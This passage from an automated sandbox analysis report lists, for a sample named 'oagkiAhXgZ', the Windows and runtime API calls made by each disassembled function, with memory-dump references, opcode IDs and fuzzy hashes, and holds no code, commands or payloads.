                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Client$Window$Screen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1296646539-0
                                                                                                    • Opcode ID: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                                                                                                    • Instruction ID: 94c0df351809f63ef0ee5ec86818efcfb0f2e9963ab6eee85aec14946876219c
                                                                                                    • Opcode Fuzzy Hash: 4dd254c02e144ff957659de75f1157c32164c2495d5edd6e120af96818318f4f
                                                                                                    • Instruction Fuzzy Hash: E7B16A35A00A8ADBDB24CFB9C4407EEB7F5FF58310F14841AE8A9D7290DB34AA51DB54
                                                                                                    APIs
                                                                                                    • __allrem.LIBCMT ref: 00AD00BA
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD00D6
                                                                                                    • __allrem.LIBCMT ref: 00AD00ED
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD010B
                                                                                                    • __allrem.LIBCMT ref: 00AD0122
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AD0140
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 1992179935-0
                                                                                                    • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                    • Instruction ID: bd662939c6e7712e4ea2a37fbdbf08403bbf1fa4b6f877b96852bb4175e907a1
                                                                                                    • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                    • Instruction Fuzzy Hash: C681C172A00706AFE720AB69CD41F6A73A9EF41764F25462FF552DB781E770DA008B90
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AC82D9,00AC82D9,?,?,?,00AD644F,00000001,00000001,8BE85006), ref: 00AD6258
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AD644F,00000001,00000001,8BE85006,?,?,?), ref: 00AD62DE
                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AD63D8
                                                                                                    • __freea.LIBCMT ref: 00AD63E5
                                                                                                      • Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852
                                                                                                    • __freea.LIBCMT ref: 00AD63EE
                                                                                                    • __freea.LIBCMT ref: 00AD6413
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: 68e8ff7ed1e5f672e234618efea416fcb60871404a6aeedb3570dbe18cf80d3b
                                                                                                    • Instruction ID: b8ee12a38b308cf0ef38d70328c6ba615f2af519c33b3e9a9e74d24f71b43b4c
                                                                                                    • Opcode Fuzzy Hash: 68e8ff7ed1e5f672e234618efea416fcb60871404a6aeedb3570dbe18cf80d3b
                                                                                                    • Instruction Fuzzy Hash: 6C51E172A00216ABDF258F64DD81EAF7BA9EF44750F15462AFC06DB241DB34DC44D660
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BCCA
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BD25
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B2BD6A
                                                                                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B2BD99
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2BDF3
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B2BDFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 1120388591-0
                                                                                                    • Opcode ID: d7ba583f2be69673ae634cdedf545cf4d7a567c7df3e14574ee5c44822aae1f6
                                                                                                    • Instruction ID: 389cbb8c2f38ea90b726363996101915b6841db320dd75e2d1eeb17259a56302
                                                                                                    • Opcode Fuzzy Hash: d7ba583f2be69673ae634cdedf545cf4d7a567c7df3e14574ee5c44822aae1f6
                                                                                                    • Instruction Fuzzy Hash: AB81AC30208241AFC714DF24D881E6ABBE5FF85348F1489ACF5598B2A2DF31ED45CB92
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(00000035), ref: 00AFF7B9
                                                                                                    • SysAllocString.OLEAUT32(00000001), ref: 00AFF860
                                                                                                    • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF889
                                                                                                    • VariantClear.OLEAUT32(00AFFA64), ref: 00AFF8AD
                                                                                                    • VariantCopy.OLEAUT32(00AFFA64,00000000), ref: 00AFF8B1
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00AFF8BB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearCopy$AllocInitString
                                                                                                    • String ID:
                                                                                                    • API String ID: 3859894641-0
                                                                                                    • Opcode ID: 86d03e215c108407060a22b5d09c19e8a8ffae990a10fd0ea3366d2770915820
                                                                                                    • Instruction ID: ae4e7ae3c25b36fe126912d774ab89a0f604e288b82b96ee7876d628423349d1
                                                                                                    • Opcode Fuzzy Hash: 86d03e215c108407060a22b5d09c19e8a8ffae990a10fd0ea3366d2770915820
                                                                                                    • Instruction Fuzzy Hash: DF51B635500318BECF24ABE5D8D5B79B3A8EF45710B249467FA05DF292DBB08C40D7A6
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA7620: _wcslen.LIBCMT ref: 00AA7625
                                                                                                      • Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A
                                                                                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 00B194E5
                                                                                                    • _wcslen.LIBCMT ref: 00B19506
                                                                                                    • _wcslen.LIBCMT ref: 00B1952D
                                                                                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 00B19585
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$FileName$OpenSave
                                                                                                    • String ID: X
                                                                                                    • API String ID: 83654149-3081909835
                                                                                                    • Opcode ID: 031f41632ecf3a3439168895d7062098f13c02bc343fc47961771b8c384c5f61
                                                                                                    • Instruction ID: 87c8c2b9237b725ba333b9a32a0edeb118306485bf0acadda23752a494499c69
                                                                                                    • Opcode Fuzzy Hash: 031f41632ecf3a3439168895d7062098f13c02bc343fc47961771b8c384c5f61
                                                                                                    • Instruction Fuzzy Hash: A9E1C0319083418FD724DF24C991AAEB7E5FF85310F1489ADF8999B2A2DB30DD45CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                                                                                                    • BeginPaint.USER32(?,?,?), ref: 00AB9241
                                                                                                    • GetWindowRect.USER32(?,?), ref: 00AB92A5
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00AB92C2
                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AB92D3
                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 00AB9321
                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AF71EA
                                                                                                      • Part of subcall function 00AB9339: BeginPath.GDI32(00000000), ref: 00AB9357
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                    • String ID:
                                                                                                    • API String ID: 3050599898-0
                                                                                                    • Opcode ID: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                                                                                                    • Instruction ID: e376b96954ac5b109e73b17dd61faa47ce4c2b230ae0fea04d8d55d38d919700
                                                                                                    • Opcode Fuzzy Hash: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                                                                                                    • Instruction Fuzzy Hash: 90418D71104200AFD711DF68C885FBB7BB8EB55320F140669FAA9972B2CB319846DB61
                                                                                                    APIs
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B1080C
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B10847
                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00B10863
                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00B108DC
                                                                                                    • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B108F3
                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B10921
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                    • String ID:
                                                                                                    • API String ID: 3368777196-0
                                                                                                    • Opcode ID: d7abfcc4cdc31f3617aebd98eddafa3bcc0b9940fb4f798a6bb6540aba92af4c
                                                                                                    • Instruction ID: 7322cb343e6c08fe5c5e689a0abeb13b11f52bf1a842abcd0bc1b1ee5f435a87
                                                                                                    • Opcode Fuzzy Hash: d7abfcc4cdc31f3617aebd98eddafa3bcc0b9940fb4f798a6bb6540aba92af4c
                                                                                                    • Instruction Fuzzy Hash: 49418D71900205EFDF14AFA4DD85AAA77B9FF04310F1440A9ED04AB297DB74DEA0DBA0
                                                                                                    APIs
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00AFF3AB,00000000,?,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00B3824C
                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00B38272
                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B382D1
                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 00B382E5
                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 00B3830B
                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B3832F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 642888154-0
                                                                                                    • Opcode ID: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                                                                                                    • Instruction ID: 2c5ec1deb5e11c205b087170914ecedad12fc3b272e1bc6c310f3e5710e467dd
                                                                                                    • Opcode Fuzzy Hash: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                                                                                                    • Instruction Fuzzy Hash: 8F418334601744AFDB12CF19DC99BA57BE0FB4A714F2841E9FA085B262CB31A842CF52
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00B04C95
                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B04CB2
                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B04CEA
                                                                                                    • _wcslen.LIBCMT ref: 00B04D08
                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B04D10
                                                                                                    • _wcsstr.LIBVCRUNTIME ref: 00B04D1A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                    • String ID:
                                                                                                    • API String ID: 72514467-0
                                                                                                    • Opcode ID: ab6716160bc0aee0c95eacb46f1c1b6eb9c3e8ae44fa584ada5bcb2fdf147991
                                                                                                    • Instruction ID: d1bdce861d0fb25626cbed6feeed020533ef68e9a78ff6c06e3a906a5348f271
                                                                                                    • Opcode Fuzzy Hash: ab6716160bc0aee0c95eacb46f1c1b6eb9c3e8ae44fa584ada5bcb2fdf147991
                                                                                                    • Instruction Fuzzy Hash: 6D21F2B2204200BBEB255B69AD4AE7F7FDCDF45750F1081B9F905DB192EB61DC0097A0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                                                                                                    • _wcslen.LIBCMT ref: 00B1587B
                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B15995
                                                                                                    • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B159AE
                                                                                                    • CoUninitialize.OLE32 ref: 00B159CC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                    • String ID: .lnk
                                                                                                    • API String ID: 3172280962-24824748
                                                                                                    • Opcode ID: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                                                                                                    • Instruction ID: 844e7375c0cd7473bb951f20f99b6e122d023611b205b7c6b7424fa0a33bec40
                                                                                                    • Opcode Fuzzy Hash: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                                                                                                    • Instruction Fuzzy Hash: C8D15471608601DFC724DF24C580A6EBBE5EF89710F54889DF88A9B261DB31ED85CB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                                                                                                      • Part of subcall function 00B00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                                                                                                      • Part of subcall function 00B00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                                                                                                      • Part of subcall function 00B00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                                                                                                      • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                                                                                                    • GetLengthSid.ADVAPI32(?,00000000,00B01335), ref: 00B017AE
                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B017BA
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00B017C1
                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B017DA
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00B01335), ref: 00B017EE
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00B017F5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                    • String ID:
                                                                                                    • API String ID: 3008561057-0
                                                                                                    • Opcode ID: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                                                                                                    • Instruction ID: e39c49ac4f8ceac8e79d166f3e2e01bc3cbb35e8c9c9e6ffe046bc9a06ab3c63
                                                                                                    • Opcode Fuzzy Hash: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                                                                                                    • Instruction Fuzzy Hash: C711BEB6500605FFDB18DFA8CC49BAE7FE9EB45355F204898F482A7290CB35AD40DB60
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B014FF
                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00B01506
                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B01515
                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 00B01520
                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0154F
                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B01563
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                    • String ID:
                                                                                                    • API String ID: 1413079979-0
                                                                                                    • Opcode ID: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                                                                                                    • Instruction ID: 062ba48f98698b1e6970369b25e1085fe748ca6221e4aa7d43c8605987076d57
                                                                                                    • Opcode Fuzzy Hash: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                                                                                                    • Instruction Fuzzy Hash: F7114472500209ABDB11CFA8DD49BDE7FA9EB48708F144064FA05A21A0C7718E649B60
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,?,00AC3379,00AC2FE5), ref: 00AC3390
                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC339E
                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC33B7
                                                                                                    • SetLastError.KERNEL32(00000000,?,00AC3379,00AC2FE5), ref: 00AC3409
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                    • String ID:
                                                                                                    • API String ID: 3852720340-0
